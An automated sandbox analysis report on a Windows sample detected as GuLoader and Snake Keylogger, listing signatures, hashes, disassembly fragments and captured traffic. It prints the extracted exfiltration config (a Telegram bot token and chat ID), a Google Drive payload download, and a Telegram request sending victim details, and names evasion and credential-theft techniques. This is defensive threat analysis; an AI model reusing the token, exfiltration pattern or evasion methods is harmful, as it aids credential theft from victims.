Windows Analysis Report
rFa24c148.exe

Overview

General Information

Sample name: rFa24c148.exe
Analysis ID: 1543495
MD5: 7644ebbf786053ffaf95dbe86b7de5d4
SHA1: 5d563fb10f6d71049ae5f69fb6ccb9f2217ddf32
SHA256: 0b7ba80811d300aefe42de77b7b8fb2d5b6f9a8d4f2cf3d1213b6fead5efb59b
Tags: exeuser-Porcupine
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8148338634:AAFvLNrhxaF7bMPzQMLbUnueRMJvDIi5kcU", "Chat_id": "7698865320", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: rFa24c148.exe ReversingLabs: Detection: 15%
Source: rFa24c148.exe Virustotal: Detection: 31% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367487A8 CryptUnprotectData, 4_2_367487A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36748EF1 CryptUnprotectData, 4_2_36748EF1
Uses 32bit PE files
Source: rFa24c148.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F2C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F4AC
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 0016FC19h 4_2_0016F974
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36552C19h 4_2_36552968
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 365531E0h 4_2_36552DC8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655E501h 4_2_3655E258
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655E0A9h 4_2_3655DE00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655E959h 4_2_3655E6B0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655F209h 4_2_3655EF60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655EDB1h 4_2_3655EB08
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36550D0Dh 4_2_36550B30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36551697h 4_2_36550B30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655F661h 4_2_3655F3B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_36550040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655FAB9h 4_2_3655F810
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655D3A1h 4_2_3655D0F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655CF49h 4_2_3655CCA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655D7F9h 4_2_3655D550
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 365531E0h 4_2_3655310E
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655DC51h 4_2_3655D9A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36747119h 4_2_36746E70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36747EB5h 4_2_36747B78
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36749280h 4_2_36748FB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36744D21h 4_2_36744A78
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674D146h 4_2_3674CE78
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36743709h 4_2_36743460
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674F136h 4_2_3674EE68
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36741CF9h 4_2_36741A50
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367402E9h 4_2_36740040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367462D9h 4_2_36746030
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674BF06h 4_2_3674BC38
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367448C9h 4_2_36744620
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674DEF6h 4_2_3674DC28
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36746CC1h 4_2_36746A18
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367432B1h 4_2_36743008
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36740B99h 4_2_367408F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674F5C6h 4_2_3674F2F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36745179h 4_2_36744ED0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36747571h 4_2_367472C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674C396h 4_2_3674C0C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674E386h 4_2_3674E0B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36742151h 4_2_36741EA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36740741h 4_2_36740498
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then mov esp, ebp 4_2_3674B081
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36746733h 4_2_36746488
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36742A01h 4_2_36742758
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674C826h 4_2_3674C558
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36740FF1h 4_2_36740D48
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674E816h 4_2_3674E548
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367479C9h 4_2_36747720
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367455D1h 4_2_36745328
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674B5E6h 4_2_3674B318
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367425A9h 4_2_36742300
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674D5D6h 4_2_3674D308
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367418A1h 4_2_367415F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674CCB6h 4_2_3674C9E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674ECA6h 4_2_3674E9D8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36745E81h 4_2_36745BD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then mov esp, ebp 4_2_3674B1C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36742E59h 4_2_36742BB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36741449h 4_2_367411A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674BA76h 4_2_3674B7A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674DA66h 4_2_3674D798
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36745A29h 4_2_36745780
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674FA56h 4_2_3674F788
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B6970h 4_2_367B6678
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B42B6h 4_2_367B3FE8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B4746h 4_2_367B4478
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BD768h 4_2_367BD470
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BAC60h 4_2_367BA968
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B0C2Eh 4_2_367B0960
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B8158h 4_2_367B7E60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B3E26h 4_2_367B3B58
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BEF50h 4_2_367BEC58
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BC448h 4_2_367BC150
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B5E16h 4_2_367B5B48
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B9940h 4_2_367B9648
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B030Eh 4_2_367B0040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B6E38h 4_2_367B6B40
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B3506h 4_2_367B3238
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BDC30h 4_2_367BD938
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BB128h 4_2_367BAE30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B54F6h 4_2_367B5228
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B8620h 4_2_367B8328
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BF418h 4_2_367BF120
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B2BE6h 4_2_367B2918
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BC910h 4_2_367BC618
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B19DEh 4_2_367B1710
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B9E08h 4_2_367B9B10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B4BD7h 4_2_367B4908
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B7300h 4_2_367B7008
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BE0F8h 4_2_367BDE00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B22C6h 4_2_367B1FF8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BB5F0h 4_2_367BB2F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B10BEh 4_2_367B0DF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B8AE8h 4_2_367B87F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BF8E0h 4_2_367BF5E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BCDD8h 4_2_367BCAE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B6347h 4_2_367B5FD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BA2D0h 4_2_367B9FD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B079Eh 4_2_367B04D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B77C8h 4_2_367B74D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BE5C0h 4_2_367BE2C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BBAB8h 4_2_367BB7C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B5986h 4_2_367B56B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B8FB0h 4_2_367B8CB8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BFDA8h 4_2_367BFAB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B3076h 4_2_367B2DA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BD2A0h 4_2_367BCFA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B1E47h 4_2_367B1BA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BA798h 4_2_367BA4A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B5066h 4_2_367B4D98
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B7C90h 4_2_367B7998
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BEA88h 4_2_367BE790
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B2756h 4_2_367B2488
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BBF80h 4_2_367BBC88
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B154Eh 4_2_367B1280
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B9478h 4_2_367B9180
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F1FE8h 4_2_367F1CF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F0338h 4_2_367F0040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F1B20h 4_2_367F1828
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F1190h 4_2_367F0E98
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F1658h 4_2_367F1360
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F0801h 4_2_367F0508
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F0CC8h 4_2_367F09D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36833E70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36833E60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36830A10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_368308DE
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36830960

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2028/10/2024%20/%2012:44:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 193.122.6.168 193.122.6.168
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49743 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49781 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.18.110:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.96.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2028/10/2024%20/%2012:44:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
